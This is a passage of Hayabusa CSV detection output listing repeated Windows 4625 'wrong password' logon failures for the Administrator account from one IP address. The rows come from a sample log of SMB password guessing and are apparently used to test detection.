NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:32.313 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rfMbFXQcP5sA2wmf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:32.349 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Xu4pgyCcDjl9h0Et | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:32.396 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B00w8dZG3sT2Lsqo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:32.450 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8aKGq6qrchp4SLvT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:32.568 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XnScYHBCKOSHItsi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:32.610 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: r8UMBM326M7a4njd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:32.648 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kTdYWOi6p7etRfya | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:32.691 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JWSlcEVzj5lGtVg0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:32.728 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Xc77wukLTPOYAzj2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:32.769 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: w4WmTwTGuwDN6YXn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:32.817 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aeN4cSffFA04oOje | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:32.849 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eYFPV1kGALqX8jyO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:32.884 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qIlhxT4qqo5bCsU3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:32.928 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: btoOskH0112h7MTO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:32.972 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nWUhQJBcS7XbMJUq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:33.004 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E70qmXDDWqmWJjyU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:33.047 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oX0L8wf6nt2grLvn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:33.081 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0D8BwniiXsjfkYqE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:33.124 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sSWYo4mphuvKHQHl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:33.164 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: im8an1mDle9f8skd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:33.200 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aOyLWd5CAAjnJt3C | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:33.240 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: s7gI55uWlshCLw3y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:33.288 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: l7UogJ8bBw6Epbht | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:33.328 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qIl0QRFHXCVAHWdV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:33.370 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OxPv9v4TxFvS9JMy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:33.417 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uHMGfCorrLXpDyeD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:33.452 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KQTKgFibIa8NWExO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:33.492 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rEnx3upH3Om0wHn7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:33.532 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KlNbW1ljPSTdgUKY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:33.582 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: w2WMd3HugfjSwJPJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:33.628 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yEy0C6dMhysbNDrX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:33.666 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vxlayd8pnAZ3dZ2Q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:33.701 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PhKO1jyWqVEdC9w2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:33.736 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dAH2mHJ4ZK5GS2p0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:33.776 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lV2ZIWGGwlkyEMRB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:33.811 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sum2yMFio9KLwZk5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:33.848 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fICXSRvv9Vm0uVpY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:33.894 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IgrOk6Fjp0QtfJ3i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:33.936 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OPKoHLtxNoiG65sl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:33.972 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NctXRH1DR3slfVxQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:34.012 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vLnAs36K1mTivu2w | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:34.056 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H7crZQ0eQ5RDNIp7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:34.108 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yHjgGhEtZgNwjaii | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:34.148 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y5gi2SS2mQiDylQ8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:34.186 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kqWJGguiWBEplJiZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:34.228 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RWP4luPa3lFolQVI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:34.276 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5K9DQWbzslRZZMSC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:34.329 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5qm0L113v24jlfjx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:34.360 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: seuUjyGmNlyYT4tU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:34.400 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FljAF4LWLmWNa3kL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:34.447 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RnN5mBOaAvYu25G7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:34.476 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: llBt31S46QVzg0Ki | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:34.524 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b1rvJUZo91Kka0G1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:34.573 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7Zqi86ZSFGRnoFM4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:34.680 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GeyeVdCUmHEKxR8f | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:34.708 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DwxJVXt79KBZalqS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:34.748 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TDfRu1OTlHmyc38P | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:34.790 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OLCAMPDWti9hjHtV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:34.833 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k2eViuJeorX2peGP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:34.868 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: davOE9p1fF2LbDP7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:34.922 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YFQsEbZnm94eSuUl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:34.965 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UnNcBIPoWdJH0x7M | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:34.997 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8Fw1xVFyar0Cal2J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:35.040 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FWzn4Oa8PQdH9Gqs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:35.081 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b68beIB5BKyMv8d3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:35.124 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HeXSJhEXzpiRX8BT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:35.169 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BQ8Zu7ByLWddD4Tk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:35.196 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: paQzUptV8scmJvsG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:35.234 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WQLsoIX9LPvbockz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:35.272 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xRYbdVMbUlqFK8oM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:35.316 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OSO730O1fxDL4DfQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:35.352 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5wmniv339HLGKB4u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:35.397 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rO3mxvgSES0lVN34 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:35.433 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fvK9k9tnCq5hwBqe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:35.465 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ujFfMT6I6L8OHag9 | IP Addr: 192.168.198.149 | AuthPackage: 